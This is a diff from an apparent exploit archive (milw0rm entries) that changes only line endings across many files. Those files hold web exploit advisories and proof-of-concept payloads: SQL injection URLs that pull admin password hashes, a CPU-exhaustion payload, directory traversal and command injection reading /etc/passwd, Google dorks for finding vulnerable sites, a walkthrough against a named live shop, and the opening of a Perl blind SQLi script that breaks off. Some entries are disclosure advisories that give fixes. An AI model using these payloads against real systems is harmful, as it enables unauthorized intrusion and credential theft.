-http://192.168.1.64/scripts/cbgrn/grn.exe/schedule/view?event=1&uid=1' - -Example Exploit Against MySQL Backend: - -http://192.168.1.64/scripts/cbgrn/grn.exe/todo/index?cid=9999999)+ORDER+BY+_id,rand(benchmark(1000000000000,sha1(123456781234567812345678)))/* - -Patch / Workaround - -Update to version 2.1.1. - -References - -http://cybozu.co.jp/products/dl/notice_060825/ - -Disclosure Timeline - -2006-07-04 - Vulnerability Discovered. -2006-07-13 - Initial Vendor Notification. -2006-07-13 - Initial Vendor Reply. -2006-07-14 - Received scheduled patch release date from vendor. -2006-08-16 - Received notification that patch release will be delayed. -2006-08-25 - Vendor released patch information on website. -2006-08-28 - Public Disclosure. - -Contact -For further enquries, comments, suggestions or bug reports, simply email them to -Tan Chew Keong (chewkeong[at]vuln[dot]sg) - -# milw0rm.com [2006-08-28] +Cybozu Garoon 2 SQL Injection Vulnerabilities + +by Tan Chew Keong +Release Date: 2006-08-28 + +Summary + +Some SQL injection vulnerabilities have been found in Cybozu Garoon 2. When exploited by a logon user, +the vulnerabilities allow manipulation of SQL statements which can lead to disclosure of information +from the database, or to cause the backend MySQL database to consume large amount of CPU resources. + +Tested Versions + +Cybuzu Garoon 2 Version 2.1.0 for Windows + +Details + +This advisory discloses several SQL injection vulnerabilities in Cybozu Garoon 2. +1) TODO List View/Modify SQL Injection Cybuzu Garoon 2 does not properly sanitise the "tid" parameter +in the TODO List View and Modify functionality. It is possible for a logon user to exploit this vulnerability +to select values from arbitrary tables in the database. + +When logon as a normal user: +TESTING NOTE a - In order for the examples to work, you must first logon as a user, then click on the TODO List link (icon) to go to the TODO List index page, before using the exploit. +TESTING NOTE b - Example 2 requires that at least 1 TODO List category has been created (category value 1). + + +Example 1: + +To retrieve the admin user's password hash via TODO List View. + +http://192.168.1.64/scripts/cbgrn/grn.exe/todo/view?tid=9999999)+union+select+1,null,col_foreign_key,col_password,2,null,0,null,null,null,null+from+tab_cb_user+where+_id=1/*&cid= + +Example 2: + +To retrieve the admin user's password hash via TODO List Modify. + +http://192.168.1.64/scripts/cbgrn/grn.exe/todo/modify?tid=9999999)+union+select+1,null,col_foreign_key,col_password,1,null,0,null,null,null,null+from+tab_cb_user+where+_id=1/*&cid= + + +2) Workflow View/Print SQL Injection + +Cybuzu Garoon 2 does not properly sanitise the "pid" parameter in the Workflow View and Print functionality. +It is possible for a logon user to exploit this vulnerability to select values from arbitrary tables in the database. + +Example 1: + +To retrieve the admin user's password hash via Workflow View. + +http://192.168.1.64/scripts/cbgrn/grn.exe/workflow/view?fid=9&pid=8888888+union+select+1,2,3,4,5,6,7,8,9,10,11,12,col_foreign_key,14,col_password,16,17,18,19,20,21,22+from+tab_cb_user where _id=1/* + +Example 2: + +To retrieve the admin user's password hash via Workflow Print. + +http://192.168.1.64/scripts/cbgrn/grn.exe/workflow/print?fid=9&pid=7777777+union+select+col_password,2,3,4,col_foreign_key,6,7,8,9,10,11,12,13,14,15,16,17,18+from+tab_cb_user where _id=1/* + +Note: In order for example 2 to work, "fid" must be a valid folder ID. + +3) Other SQL Injection Vulnerabilities + +Several other SQL injection vulnerabilities exists. These may e.g. be exploited to cause the MySQL-based Cybozu Database Engine to consume large amount of CPU resources, potentially causing a DoS. + +SQL Injection: + +http://192.168.1.64/scripts/cbgrn/grn.exe/todo/index?cid=[SQL] +http://192.168.1.64/scripts/cbgrn/grn.exe/todo/delete?tid=[SQL] +http://192.168.1.64/scripts/cbgrn/grn.exe/schedule/user_view?uid=1[SQL] +http://192.168.1.64/scripts/cbgrn/grn.exe/phonemessage/add?gid=1&uid=1[SQL] +http://192.168.1.64/scripts/cbgrn/grn.exe/phonemessage/history?gid=1&uid=1[SQL] +http://192.168.1.64/scripts/cbgrn/grn.exe/memo/view?iid=1[SQL]&did= +http://192.168.1.64/scripts/cbgrn/grn.exe/memo/print?iid=1[SQL]&did= +http://192.168.1.64/scripts/cbgrn/grn.exe/schedule/view?event=1[SQL] +http://192.168.1.64/scripts/cbgrn/grn.exe/schedule/view?event=1&uid=1[SQL] + +Test Samples: + +http://192.168.1.64/scripts/cbgrn/grn.exe/todo/index?cid=' +http://192.168.1.64/scripts/cbgrn/grn.exe/todo/delete?tid=' +http://192.168.1.64/scripts/cbgrn/grn.exe/schedule/user_view?uid=1' +http://192.168.1.64/scripts/cbgrn/grn.exe/phonemessage/add?gid=1&uid=1' +http://192.168.1.64/scripts/cbgrn/grn.exe/phonemessage/history?gid=1&uid=1' +http://192.168.1.64/scripts/cbgrn/grn.exe/memo/view?iid=1'&did= +http://192.168.1.64/scripts/cbgrn/grn.exe/memo/print?iid=1'&did= +http://192.168.1.64/scripts/cbgrn/grn.exe/schedule/view?event=1' +http://192.168.1.64/scripts/cbgrn/grn.exe/schedule/view?event=1&uid=1' + +Example Exploit Against MySQL Backend: + +http://192.168.1.64/scripts/cbgrn/grn.exe/todo/index?cid=9999999)+ORDER+BY+_id,rand(benchmark(1000000000000,sha1(123456781234567812345678)))/* + +Patch / Workaround + +Update to version 2.1.1. + +References + +http://cybozu.co.jp/products/dl/notice_060825/ + +Disclosure Timeline + +2006-07-04 - Vulnerability Discovered. +2006-07-13 - Initial Vendor Notification. +2006-07-13 - Initial Vendor Reply. +2006-07-14 - Received scheduled patch release date from vendor. +2006-08-16 - Received notification that patch release will be delayed. +2006-08-25 - Vendor released patch information on website. +2006-08-28 - Public Disclosure. + +Contact +For further enquries, comments, suggestions or bug reports, simply email them to +Tan Chew Keong (chewkeong[at]vuln[dot]sg) + +# milw0rm.com [2006-08-28] diff --git a/platforms/cgi/webapps/242.pl b/platforms/cgi/webapps/242.pl index 25a24206b..6fe1ecd2c 100755 --- a/platforms/cgi/webapps/242.pl +++ b/platforms/cgi/webapps/242.pl @@ -32,6 +32,6 @@ sysread($sock, $buffer, 100000); } } close $sock; - - -# milw0rm.com [2001-01-12] + + +# milw0rm.com [2001-01-12] diff --git a/platforms/cgi/webapps/289.pl b/platforms/cgi/webapps/289.pl index 44665e684..8a1e88474 100755 --- a/platforms/cgi/webapps/289.pl +++ b/platforms/cgi/webapps/289.pl @@ -53,6 +53,6 @@ push @DATA, $_; } my $woot = join(' ',@DATA); if($woot =~/$ARGV[1] wasn't found/) { print "$ARGV[1] dosnt seem to exist.\n"; exit 0; } -else { print "@DATA"; } - -# milw0rm.com [2001-03-04] +else { print "@DATA"; } + +# milw0rm.com [2001-03-04] diff --git a/platforms/cgi/webapps/3065.txt b/platforms/cgi/webapps/3065.txt index 41a2af5fb..d4d4137f4 100755 --- a/platforms/cgi/webapps/3065.txt +++ b/platforms/cgi/webapps/3065.txt @@ -1,17 +1,17 @@ - WWWBoard 2.0 Alpha 2 (passwd.txt) Password Disclosure Vulnerability - - - -Affected Software: WWWBoard 2.0 Alpha - -Download: http://www.scriptarchive.com/wwwboard.html - -Bugfounder: bd0rk - -Contact: bd0rk[at]hackermail.com - -Greetz: str0ke, Döner, TheJT, x0r_32 - -[+]Exploit: http://[target]/[www_board_path]/passwd.txt - -# milw0rm.com [2007-01-01] + WWWBoard 2.0 Alpha 2 (passwd.txt) Password Disclosure Vulnerability + + + +Affected Software: WWWBoard 2.0 Alpha + +Download: http://www.scriptarchive.com/wwwboard.html + +Bugfounder: bd0rk + +Contact: bd0rk[at]hackermail.com + +Greetz: str0ke, Döner, TheJT, x0r_32 + +[+]Exploit: http://[target]/[www_board_path]/passwd.txt + +# milw0rm.com [2007-01-01] diff --git a/platforms/cgi/webapps/3412.txt b/platforms/cgi/webapps/3412.txt index b17ee2947..941a20715 100755 --- a/platforms/cgi/webapps/3412.txt +++ b/platforms/cgi/webapps/3412.txt @@ -1,64 +1,64 @@ -I - TITLE - -Security advisory: Arbitrary file disclosure vulnerability in -rrdbrowse - -II - SUMMARY - -Description: Arbitrary file disclosure vulnerability in -rrdbrowse <= 1.6 - -Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com), -http://www.devtarget.org - -Date: March 4th, 2007 - -Severity: Medium - -References: http://www.devtarget.org/rrdbrowse-advisory-03-2007.txt - -III - OVERVIEW - -Quote from rrdbrowse.org: "RRDBrowse is a poller daemon, templater and -webinterface for RRDTool. It has a threaded daemon which periodically -runs from cron. It works with small .nfo files which hold router -information and optionally connection details, colors, min max, -bandwidth settings, etc, etc. RRDBrowse uses a small caching mechanism -to store interface names. It's much MRTG like in it's current state". -More information about the product can be found online at -http://www.rrdbrowse.org. - -IV - DETAILS - -Due to inproper input validation, the CGI application "rrdbrowse" -(versions <=1.6) is vulnerable to an arbitrary file disclosure -vulnerability. It allows an unauthenticated remote attacker to read any -file on the remote system if the user the webserver is running as has -permissions to do so. Thus an attacker is able to gain access -potentially sensitive information. - -V - EXPLOIT CODE - -The vulnerability is trivial to exploit and only requires specifying an -URL with a relative file path on the remote system such as - -http://$target/cgi-bin/rb.cgi?mode=page&file=../../../../../../../../etc/passwd - -As the input to the "file" parameter is not validated in any way -accessing this URL will expose the contents of /etc/passwd to a remote -attacker (interestingly except the first line). - -VI - WORKAROUND/FIX - -To address this problem, the author of rrdbrowse (Tommy van Leeuwen) has -released an updated CVS version (1.7) of the software which is available -at http://www.rrdbrowse.org. Hence all users of rrdbrowse are asked to -test and install this version as soon as possible. - -VII - DISCLOSURE TIMELINE - -06. February 2007 - Notified vendor -14. Feburary 2007 - Patch/new version released -04. March 2007 - Public disclosure - -# milw0rm.com [2007-03-04] +I - TITLE + +Security advisory: Arbitrary file disclosure vulnerability in +rrdbrowse + +II - SUMMARY + +Description: Arbitrary file disclosure vulnerability in +rrdbrowse <= 1.6 + +Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com), +http://www.devtarget.org + +Date: March 4th, 2007 + +Severity: Medium + +References: http://www.devtarget.org/rrdbrowse-advisory-03-2007.txt + +III - OVERVIEW + +Quote from rrdbrowse.org: "RRDBrowse is a poller daemon, templater and +webinterface for RRDTool. It has a threaded daemon which periodically +runs from cron. It works with small .nfo files which hold router +information and optionally connection details, colors, min max, +bandwidth settings, etc, etc. RRDBrowse uses a small caching mechanism +to store interface names. It's much MRTG like in it's current state". +More information about the product can be found online at +http://www.rrdbrowse.org. + +IV - DETAILS + +Due to inproper input validation, the CGI application "rrdbrowse" +(versions <=1.6) is vulnerable to an arbitrary file disclosure +vulnerability. It allows an unauthenticated remote attacker to read any +file on the remote system if the user the webserver is running as has +permissions to do so. Thus an attacker is able to gain access +potentially sensitive information. + +V - EXPLOIT CODE + +The vulnerability is trivial to exploit and only requires specifying an +URL with a relative file path on the remote system such as + +http://$target/cgi-bin/rb.cgi?mode=page&file=../../../../../../../../etc/passwd + +As the input to the "file" parameter is not validated in any way +accessing this URL will expose the contents of /etc/passwd to a remote +attacker (interestingly except the first line). + +VI - WORKAROUND/FIX + +To address this problem, the author of rrdbrowse (Tommy van Leeuwen) has +released an updated CVS version (1.7) of the software which is available +at http://www.rrdbrowse.org. Hence all users of rrdbrowse are asked to +test and install this version as soon as possible. + +VII - DISCLOSURE TIMELINE + +06. February 2007 - Notified vendor +14. Feburary 2007 - Patch/new version released +04. March 2007 - Public disclosure + +# milw0rm.com [2007-03-04] diff --git a/platforms/cgi/webapps/4261.txt b/platforms/cgi/webapps/4261.txt index 9d1f6be36..693cd41ef 100755 --- a/platforms/cgi/webapps/4261.txt +++ b/platforms/cgi/webapps/4261.txt @@ -1,12 +1,12 @@ -################################################################################# -# YNP Portal System 2.2.0 (showpage.cgi p) Remote File Disclosure Vulnerability # -# D0RK : inurl:"showpage.cgi?p=popsearch.html" # -# : inurl:"showpage.cgi?p=support.html" # -# : inurl:"showpage.cgi?p=dialup.html" # -# : inurl:"showpage.cgi?p=" # -# POC: http://xxxx.com/showpage.cgi?p=../../../../../../etc/passwd # -# Discovered by: GolD_M = [Mahmood_ali] # -# Thanx To : Tryag-Team & Asbmay's Group & bd0rk & Cold Zero & All My Friends # -################################################################################# - -# milw0rm.com [2007-08-06] +################################################################################# +# YNP Portal System 2.2.0 (showpage.cgi p) Remote File Disclosure Vulnerability # +# D0RK : inurl:"showpage.cgi?p=popsearch.html" # +# : inurl:"showpage.cgi?p=support.html" # +# : inurl:"showpage.cgi?p=dialup.html" # +# : inurl:"showpage.cgi?p=" # +# POC: http://xxxx.com/showpage.cgi?p=../../../../../../etc/passwd # +# Discovered by: GolD_M = [Mahmood_ali] # +# Thanx To : Tryag-Team & Asbmay's Group & bd0rk & Cold Zero & All My Friends # +################################################################################# + +# milw0rm.com [2007-08-06] diff --git a/platforms/cgi/webapps/4264.txt b/platforms/cgi/webapps/4264.txt index 172b8c286..d7a218ef9 100755 --- a/platforms/cgi/webapps/4264.txt +++ b/platforms/cgi/webapps/4264.txt @@ -1,37 +1,37 @@ -author:meoconx[at]vnbrain.net -product:CartWeaver -main site:www.cartweaver.com -1.with CFM CartWeaver: -sql injection in: -Details.cfm?ProdID=a' - -demo: -http://www.jbracing.co.uk/Details.cfm?ProdID=1' -**************** -exploit: -http://www.xxx.com/Details.cfm?ProdID=[sql query] -**************** -link admin: -http://www.xxx.com/[script path]/cw2/admin/ -**************** -dork: -allinurl:Details.cfm ?ProdID= -allinurl:Results.cfm?category= -*************** -******************** -An example: -http://www.xxxxx.co.uk/Details.cfm?ProdID=1' -******************** -exploit it: --get username: -http://www.xxxxx.co.uk/Details.cfm?ProdID=1%20and%201=convert(int,(select%20top%201%20admin_username%20from%20tbl_adminusers)) -Conversion failed when converting the nvarchar value 'jim' to data type int. -==> the username is "jim" --get password: -http://www.xxxxx.co.uk/Details.cfm?ProdID=1%20and%201=convert(int,(select%20top%201%20char(97)%2badmin_password%20from%20tbl_adminusers)) -Conversion failed when converting the nvarchar value 'a518888' to data type int. The error occurred. on line 116. -==> the password is "51888"( because we added the "a" in the query to get the number that can be converted to integer value) --now, login into admin: -http://www.xxxxx.co.uk/cw2/admin/ - -# milw0rm.com [2007-08-06] +author:meoconx[at]vnbrain.net +product:CartWeaver +main site:www.cartweaver.com +1.with CFM CartWeaver: +sql injection in: +Details.cfm?ProdID=a' + +demo: +http://www.jbracing.co.uk/Details.cfm?ProdID=1' +**************** +exploit: +http://www.xxx.com/Details.cfm?ProdID=[sql query] +**************** +link admin: +http://www.xxx.com/[script path]/cw2/admin/ +**************** +dork: +allinurl:Details.cfm ?ProdID= +allinurl:Results.cfm?category= +*************** +******************** +An example: +http://www.xxxxx.co.uk/Details.cfm?ProdID=1' +******************** +exploit it: +-get username: +http://www.xxxxx.co.uk/Details.cfm?ProdID=1%20and%201=convert(int,(select%20top%201%20admin_username%20from%20tbl_adminusers)) +Conversion failed when converting the nvarchar value 'jim' to data type int. +==> the username is "jim" +-get password: +http://www.xxxxx.co.uk/Details.cfm?ProdID=1%20and%201=convert(int,(select%20top%201%20char(97)%2badmin_password%20from%20tbl_adminusers)) +Conversion failed when converting the nvarchar value 'a518888' to data type int. The error occurred. on line 116. +==> the password is "51888"( because we added the "a" in the query to get the number that can be converted to integer value) +-now, login into admin: +http://www.xxxxx.co.uk/cw2/admin/ + +# milw0rm.com [2007-08-06] diff --git a/platforms/cgi/webapps/4343.txt b/platforms/cgi/webapps/4343.txt index 737e7ccca..48ee4b996 100755 --- a/platforms/cgi/webapps/4343.txt +++ b/platforms/cgi/webapps/4343.txt @@ -1,15 +1,15 @@ -++++++++++++++++++++++++++++++++++++ -| Discovered by Breaker_unit & Don | -| Ourspace 2.0.9| -script info: http://www.codedworld.com/download/our-space/26931.html - -Exploit: /cgi-bin/ourspace/newswire/uploadmedia.cgi -dork: inurl:"/cgi-bin/ourspace/ - -Greetz to: -Balcan Crew Members -h4cky0u.org -and my friends: str0ke & kw3rLn -+++++++++++++++++++++++++++++++++++++++ - -# milw0rm.com [2007-08-30] +++++++++++++++++++++++++++++++++++++ +| Discovered by Breaker_unit & Don | +| Ourspace 2.0.9| +script info: http://www.codedworld.com/download/our-space/26931.html + +Exploit: /cgi-bin/ourspace/newswire/uploadmedia.cgi +dork: inurl:"/cgi-bin/ourspace/ + +Greetz to: +Balcan Crew Members +h4cky0u.org +and my friends: str0ke & kw3rLn ++++++++++++++++++++++++++++++++++++++++ + +# milw0rm.com [2007-08-30] diff --git a/platforms/cgi/webapps/4529.txt b/platforms/cgi/webapps/4529.txt index 75167d6f0..9a96e46ad 100755 --- a/platforms/cgi/webapps/4529.txt +++ b/platforms/cgi/webapps/4529.txt @@ -1,36 +1,36 @@ -# WWWISIS (Search) Multiple Vulnerabilities -# Download: -# http://bvsmodelo.bvsalud.org/php/level.php?lang=en&component=31&item=2 -# Bug found by JosS -# Contact: sys-project[at]hotmail.com -# Spanish Hackers Team -# www.spanish-hackers.com -# d0rk: powered by WWWISIS -#Stop lammer - - -# Local File Disclosure Vulnerability: - -http://server/cgi-bin/wxis.exe/iah/?IsisScript=[file] -http://server/cgi-bin/wxis.exe/iah/?IsisScript=../../../../../../../../../etc/passwd - - -# Exploit In (XSS): - -http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article%5Edlibrary&fmt=iso.pft&lang=i -http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article%5Edlibrary&fmt=iso.pft&lang=e -.... - -[ i,e ... ] it is the language of script - -# Cross Siting Scripting: - - - - -//---------------------------------------\\ - -Greetz To: All Hackers -JosS! - -# milw0rm.com [2007-10-13] +# WWWISIS (Search) Multiple Vulnerabilities +# Download: +# http://bvsmodelo.bvsalud.org/php/level.php?lang=en&component=31&item=2 +# Bug found by JosS +# Contact: sys-project[at]hotmail.com +# Spanish Hackers Team +# www.spanish-hackers.com +# d0rk: powered by WWWISIS +#Stop lammer + + +# Local File Disclosure Vulnerability: + +http://server/cgi-bin/wxis.exe/iah/?IsisScript=[file] +http://server/cgi-bin/wxis.exe/iah/?IsisScript=../../../../../../../../../etc/passwd + + +# Exploit In (XSS): + +http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article%5Edlibrary&fmt=iso.pft&lang=i +http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article%5Edlibrary&fmt=iso.pft&lang=e +.... + +[ i,e ... ] it is the language of script + +# Cross Siting Scripting: + + + + +//---------------------------------------\\ + +Greetz To: All Hackers +JosS! + +# milw0rm.com [2007-10-13] diff --git a/platforms/cgi/webapps/464.txt b/platforms/cgi/webapps/464.txt index b957bc743..264f7187d 100755 --- a/platforms/cgi/webapps/464.txt +++ b/platforms/cgi/webapps/464.txt @@ -2,6 +2,6 @@ Some demonstration exploit URLs are provided: /cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd%00 /cgi-bin /tseekdir.cgi?id=799&location=/etc/passwd%00 - - -# milw0rm.com [2004-09-13] + + +# milw0rm.com [2004-09-13] diff --git a/platforms/cgi/webapps/4647.txt b/platforms/cgi/webapps/4647.txt index 95892e035..8d84aa90e 100755 --- a/platforms/cgi/webapps/4647.txt +++ b/platforms/cgi/webapps/4647.txt @@ -1,11 +1,11 @@ -"KB-Bestellsystem" is a domain order system written in Perl. -The "domain" and "tld" parameters in "kb_whois.cgi" are not filtering shell metacharacters. - -The following examples will show you the /etc/passwd file: - -http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=;cat%20/etc/passwd;&tld=.com&tarrif= -http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=google&tld=.com;cat /etc/passwd;&tarrif= - -<< Greetz Zero X >> - -# milw0rm.com [2007-11-22] +"KB-Bestellsystem" is a domain order system written in Perl. +The "domain" and "tld" parameters in "kb_whois.cgi" are not filtering shell metacharacters. + +The following examples will show you the /etc/passwd file: + +http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=;cat%20/etc/passwd;&tld=.com&tarrif= +http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=google&tld=.com;cat /etc/passwd;&tarrif= + +<< Greetz Zero X >> + +# milw0rm.com [2007-11-22] diff --git a/platforms/cgi/webapps/4977.txt b/platforms/cgi/webapps/4977.txt index 2ea7528a0..724bc3ef3 100755 --- a/platforms/cgi/webapps/4977.txt +++ b/platforms/cgi/webapps/4977.txt @@ -1,48 +1,48 @@ -Application: aconon(R) Mail - -Affected versions: probably all known, tested against 2007 Enterprise -SQL 11.7.0 and 2004 Enterprise SQL 11.5.1 - -Affected plattforms: every, Aconon runs at (Win32, Linux, Solaris ...) - -Exploitation: remote - -Description: Aconon Mail is a commercial newsletter software, providing -a feature rich web interface for both, users and administrators. This -includes a public available archive of sent newsletters. Those archived -e-mails may be accessed through the web browser, processed by a template - engine. The used template may be overwritten by any user, modifying the -HTTP-GET "template" form parameter. This parameter is checked against -code injection, not against directory traversal though. - -Proof of Concept: - -http://www.aconon.de/mail-demo/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save&template=data/password.pl&link=%3C%3C%3C%3C -vhttp://www.aconon.de/mail-demo/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save&template=../../../../../../etc/passwd&link=%3C%3C%3C%3C - -Fix: - -No fix has been published yet. However this workaround should patch the -issue: - -Add in archiv.cgi below - $FORM{'template'} =~ s/\|//g; - -this code: - - use File::Basename; - $FORM{'template'} = ($FORM{'template'}) ? basename($FORM{'template'}) -: ""; - if ($FORM{'template'} && $FORM{'template'} !~ /\.html$/) { - &error ("$TXT{'1501'}"); - } - -Status: the vendor has been informed. - - -German readers of the list may also read -http://burnachurch.com/67/directory-traversal-luecke-in-aconon-mail/ - -P.S. greets to missi - you're great :o) - -# milw0rm.com [2008-01-23] +Application: aconon(R) Mail + +Affected versions: probably all known, tested against 2007 Enterprise +SQL 11.7.0 and 2004 Enterprise SQL 11.5.1 + +Affected plattforms: every, Aconon runs at (Win32, Linux, Solaris ...) + +Exploitation: remote + +Description: Aconon Mail is a commercial newsletter software, providing +a feature rich web interface for both, users and administrators. This +includes a public available archive of sent newsletters. Those archived +e-mails may be accessed through the web browser, processed by a template + engine. The used template may be overwritten by any user, modifying the +HTTP-GET "template" form parameter. This parameter is checked against +code injection, not against directory traversal though. + +Proof of Concept: + +http://www.aconon.de/mail-demo/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save&template=data/password.pl&link=%3C%3C%3C%3C +vhttp://www.aconon.de/mail-demo/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save&template=../../../../../../etc/passwd&link=%3C%3C%3C%3C + +Fix: + +No fix has been published yet. However this workaround should patch the +issue: + +Add in archiv.cgi below + $FORM{'template'} =~ s/\|//g; + +this code: + + use File::Basename; + $FORM{'template'} = ($FORM{'template'}) ? basename($FORM{'template'}) +: ""; + if ($FORM{'template'} && $FORM{'template'} !~ /\.html$/) { + &error ("$TXT{'1501'}"); + } + +Status: the vendor has been informed. + + +German readers of the list may also read +http://burnachurch.com/67/directory-traversal-luecke-in-aconon-mail/ + +P.S. greets to missi - you're great :o) + +# milw0rm.com [2008-01-23] diff --git a/platforms/cgi/webapps/53.c b/platforms/cgi/webapps/53.c index 2bc89425d..f604d5fd6 100755 --- a/platforms/cgi/webapps/53.c +++ b/platforms/cgi/webapps/53.c @@ -176,6 +176,6 @@ done: return (-1); return (fd); -} - -// milw0rm.com [2003-07-10] +} + +// milw0rm.com [2003-07-10] diff --git a/platforms/cgi/webapps/5304.txt b/platforms/cgi/webapps/5304.txt index 6c979a513..20aeeb6f9 100755 --- a/platforms/cgi/webapps/5304.txt +++ b/platforms/cgi/webapps/5304.txt @@ -1,9 +1,9 @@ -HIS-Webshop is a shopping-system written in Perl by www.shoppark.de -The script doesn´t check the "t"-parameter. - -Example: -http://server.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00 - -<< Greetz Zero X >> - -# milw0rm.com [2008-03-24] +HIS-Webshop is a shopping-system written in Perl by www.shoppark.de +The script doesn´t check the "t"-parameter. + +Example: +http://server.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00 + +<< Greetz Zero X >> + +# milw0rm.com [2008-03-24] diff --git a/platforms/cgi/webapps/5662.txt b/platforms/cgi/webapps/5662.txt index 96ae3fcaf..a93f75993 100755 --- a/platforms/cgi/webapps/5662.txt +++ b/platforms/cgi/webapps/5662.txt @@ -1,90 +1,90 @@ -Digital Security Research Group [DSecRG] Advisory #DSECRG-08-020 - - -Application: Alcatel OmniPCX Office -Versions Affected: Alcatel OmniPCX Office since release 210/061.1 -Vendor URL: http://alcatel.com -Bugs: Remote command execution -Exploits: YES -Risk: High -CVSS Score: 7.31 -CVE-number: 2008-1331 -Reported: 31.01.2008 -Vendor response: 01.02.2008 -Customers informed: 07.03.2008 -Published on PSIRT: 01.04.2008 -Date of Public Advisory: 21.05.2008 -Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) - - - -Introduction -************ - -The OmniPCX Enterprise is an integrated communications solution for -medium-sized businesses and large corporations. It combines the best of -the old (legacy TDM phone connectivity) with the new (a native IP -platform and support for Session Initiation Protocol, or SIP) to provide -an effective and complete communications solution for cost-conscious -companies on the cutting edge. - -(from the vendor's homepage) - - -Description -*********** - -Alcatel OmniPCX Office Web Interface has critical security vulnerability Remote command execution - -The risk of this vulnerability is high. Any user which has access to the -web interface of the OmniPCX Enterprise solution will be able to execute -arbitrary commands on the server with the permissions of the webserver. - - -Details -******* - - -Remote command execution vulnerability found in script /cgi-data/FastJSData.cgi in parameter name id2 -Variable id2 not being filtered when passed to the shell. Thus, arbitrary commands can be executed on -the server by adding them to the user variable, separated by semicolons. - -You can find more details on this advisory on vendors website http://www1.alcatel-lucent.com/psirt/statements.htm -under reference 2008001 - - - -Example: - - -http://[server]/cgi-data/FastJSData.cgi?id1=sh2kerr&id2=91|cat%20/etc/passwd - - - - -Fix Information -*************** - -Alcatel was altered to fix this flaw on 01.04.2008. Updated version can be downloaded here: - -http://www1.alcatel-lucent.com/enterprise/en/products/ip_telephony/omnipcxenterprise/index.html - - - - - - -About -***** - -Digital Security is leading IT security company in Russia, providing information security consulting, -audit and penetration testing services, risk analysis and ISMS-related services and certification for -ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application -and database security problems with vulnerability reports, advisories and whitepapers posted regularly -on our website. - - -Contact: research [at] dsec [dot] ru - http://www.dsec.ru (in Russian) - -# milw0rm.com [2008-05-21] +Digital Security Research Group [DSecRG] Advisory #DSECRG-08-020 + + +Application: Alcatel OmniPCX Office +Versions Affected: Alcatel OmniPCX Office since release 210/061.1 +Vendor URL: http://alcatel.com +Bugs: Remote command execution +Exploits: YES +Risk: High +CVSS Score: 7.31 +CVE-number: 2008-1331 +Reported: 31.01.2008 +Vendor response: 01.02.2008 +Customers informed: 07.03.2008 +Published on PSIRT: 01.04.2008 +Date of Public Advisory: 21.05.2008 +Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) + + + +Introduction +************ + +The OmniPCX Enterprise is an integrated communications solution for +medium-sized businesses and large corporations. It combines the best of +the old (legacy TDM phone connectivity) with the new (a native IP +platform and support for Session Initiation Protocol, or SIP) to provide +an effective and complete communications solution for cost-conscious +companies on the cutting edge. + +(from the vendor's homepage) + + +Description +*********** + +Alcatel OmniPCX Office Web Interface has critical security vulnerability Remote command execution + +The risk of this vulnerability is high. Any user which has access to the +web interface of the OmniPCX Enterprise solution will be able to execute +arbitrary commands on the server with the permissions of the webserver. + + +Details +******* + + +Remote command execution vulnerability found in script /cgi-data/FastJSData.cgi in parameter name id2 +Variable id2 not being filtered when passed to the shell. Thus, arbitrary commands can be executed on +the server by adding them to the user variable, separated by semicolons. + +You can find more details on this advisory on vendors website http://www1.alcatel-lucent.com/psirt/statements.htm +under reference 2008001 + + + +Example: + + +http://[server]/cgi-data/FastJSData.cgi?id1=sh2kerr&id2=91|cat%20/etc/passwd + + + + +Fix Information +*************** + +Alcatel was altered to fix this flaw on 01.04.2008. Updated version can be downloaded here: + +http://www1.alcatel-lucent.com/enterprise/en/products/ip_telephony/omnipcxenterprise/index.html + + + + + + +About +***** + +Digital Security is leading IT security company in Russia, providing information security consulting, +audit and penetration testing services, risk analysis and ISMS-related services and certification for +ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application +and database security problems with vulnerability reports, advisories and whitepapers posted regularly +on our website. + + +Contact: research [at] dsec [dot] ru + http://www.dsec.ru (in Russian) + +# milw0rm.com [2008-05-21] diff --git a/platforms/cgi/webapps/6108.pl b/platforms/cgi/webapps/6108.pl index 61e07d2e6..886e31dc3 100755 --- a/platforms/cgi/webapps/6108.pl +++ b/platforms/cgi/webapps/6108.pl @@ -1,96 +1,96 @@ -#!/usr/bin/perl -use LWP::UserAgent; -use Getopt::Long; -if(!$ARGV[1]) -{ - print " \n"; - print " #################### Viva IslaMe Viva IslaMe ################\n"; - print " # MojoClassifieds Blind SQL Injection Exploit #\n"; - print " # (mojoClassified.cgi mojo ) #\n"; - print " # Author: Mr.SQL #\n"; - print " # EMAIL : SQL@HOTMAIL.IT #\n"; - print " # #\n"; - print " # -((:: GrE3E3E3E3E3ETZ ::))- #\n"; - print " # #\n"; - print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #\n"; - print " # :: ALwHeD :: milw0rm :: #\n"; - print " # #\n"; - print " # <<>> MuSliMs HaCkErS <<>> #\n"; - print " # #\n"; - print " # HOME: WwW.PaL-HaCkEr.CoM #\n"; - print " # #\n"; - print " # Usage : perl test.pl host #\n"; - print " # Example: perl test.pl www.host.com / -d 10 #\n"; - print " # Options: #\n"; - print " # -d valid cat_a value #\n"; - print " #############################################################\n"; - exit; -} -my $host = $ARGV[0]; -my $cat_a = $ARGV[2]; -my %options = (); -GetOptions(\%options, "u=i", "p=s", "d=i"); -print "[~] Exploiting...\n"; -if($options{"b"}) -{ - $mojo = $options{"b"}; -} -syswrite(STDOUT, 